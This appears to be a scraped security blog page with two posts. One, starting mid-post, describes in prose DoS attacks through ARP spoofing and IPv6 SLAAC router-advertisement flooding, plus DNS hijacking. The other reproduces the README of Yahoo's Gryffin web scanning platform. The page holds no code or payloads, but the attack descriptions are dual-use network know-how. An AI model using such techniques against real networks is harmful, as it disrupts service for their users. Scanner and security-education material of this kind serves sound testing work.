Denial of Service (DoS) attack: The DoS attack is an attack to a system of machines or network that results in a service or resource being inaccessible for its users. Normally it provokes the loss of network connectivity due to consumption of the bandwidth of the victim’s network, or overloads the computing resources of the victim’s system.

DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists in associating a nonexistent MAC address in a victim’s ARP table. This results in rendering the machine whose ARP table has been modified incapable of connecting to the IP address associated to the nonexistent MAC.
DoS attack in IPv6 with SLAAC attack: In this type of attack a large quantity of “router advertisement” packets are generated, destined to one or several machines, announcing false routers and assigning a different IPv6 address and link gate for each router, collapsing the system and making machines unresponsive.

DNS Hijacking: The DNS Hijacking attack or DNS kidnapping consists in altering the resolution of the domain names system (DNS). This can be achieved using malware that invalidates the configuration of a TCP/IP machine so that it points to a pirate DNS server under the attacker’s control, or by way of an MITM attack, with the attacker being the party who receives the DNS requests, and responding himself or herself to a specific DNS request to direct the victim toward a specific destination selected by the attacker.

Download

Read more

by Malik korrich ~ mardi 29 septembre 2015 0 commentaires

Gryffin: A Large Scale Web Security Scanning Platform Project By Yahoo

Gryffin: A Large Scale Web Security Scanning Platform Project By Yahoo!

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to capability of scanning, and supporting a large elastic application infrastructure. Simply put, the ability to scan 1000 applications today to 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage

Coverage has two dimensions - one during crawl and the other during fuzzing. In crawl phase, coverage implies being able to find as much of the application footprint. In scan phase, or while fuzzing, it implies being able to test each part of the application for an applied set of vulnerabilities in a deep.

Crawl Coverage

Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. For a security scanner, it just needs one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication

At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.

DOM Rendering and Navigation

A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage

As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.

It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.

For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.

The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale

While Gryffin is available as a standalone package, it's primarily built for scale.

Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Pre-requisites

1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
4. Arachni (for fuzzing XSS and web vulnerabilities)
5. NSQ

• running lookupd at port 4160,4161
• running nsqd at port 4150,4151
• with --max-msg-size=5000000

6. Kibana and Elastic search, for dashboarding

• listening to JSON over port 5000
• Preconfigured docker image available in https://hub.docker.com/r/yukinying/elk/

Installation

go get github.com/yahoo/gryffin/...

Run

TODO

• Mobile browser user agent
• Preconfigured docker images
• Redis for sharing states across machines
• Instruction to run gryffin (distributed or standalone)
• Documentation for html-distance
• Implement a JSON serializable cookiejar.
• Identify duplicate url patterns based on simhash result.

Download

Read more

by Malik korrich ~ samedi 26 septembre 2015 0 commentaires